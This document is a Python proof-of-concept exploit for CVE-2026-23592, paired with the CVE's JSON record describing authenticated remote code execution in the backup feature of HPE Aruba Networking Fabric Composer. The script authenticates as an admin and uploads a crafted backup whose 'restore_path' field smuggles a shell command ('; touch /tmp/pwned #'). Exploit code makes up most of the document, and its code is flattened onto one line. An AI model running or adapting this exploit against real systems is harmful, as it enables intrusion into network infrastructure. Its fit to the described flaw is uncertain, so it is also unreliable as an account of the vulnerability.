CVE-2026-23592

# CVE-2026-23592 PoC - Backup Function RCE import requests import json import base64 TARGET = "https://target-arbua-fabric.local" LOGIN_ENDPOINT = f"{TARGET}/api/v1/auth/login" BACKUP_ENDPOINT = f"{TARGET}/api/v1/backup/restore" def exploit(): # Step 1: Authenticate with high-privilege account credentials = { "username": "admin", "password": "admin_password" } session = requests.Session() auth_response = session.post(LOGIN_ENDPOINT, json=credentials) if auth_response.status_code != 200: print("[-] Authentication failed") return print("[+] Authentication successful") token = auth_response.json().get('token') headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Step 2: Prepare malicious backup with command injection # The backup file contains a crafted configuration that triggers RCE malicious_backup = { "backup_version": "1.0", "type": "full_backup", "data": { "config": { "db_host": "localhost", "db_name": "fabric_composer", "restore_path": "; touch /tmp/pwned #" } } } # Step 3: Upload malicious backup to trigger RCE print("[+] Uploading malicious backup...") exploit_response = session.post( BACKUP_ENDPOINT, headers=headers, json=malicious_backup ) if exploit_response.status_code == 200: print("[+] RCE Exploit Successful!") print(f"[+] Check /tmp/pwned on target system") else: print(f"[-] Exploit failed: {exploit_response.status_code}") print(exploit_response.text) if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-23592", "sourceIdentifier": "[email protected]", "published": "2026-01-27T18:15:56.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure file operations in HPE Aruba Networking Fabric Composer’s backup functionality could allow authenticated attackers to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system."}, {"lang": "es", "value": "Operaciones de archivo inseguras en la funcionalidad de copia de seguridad de HPE Aruba Networking Fabric Composer podrían permitir a atacantes autenticados lograr la ejecución remota de código. La explotación exitosa podría permitir a un atacante ejecutar comandos arbitrarios en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04996en_us&docLocale=en_US", "source": "[email protected]"}]}}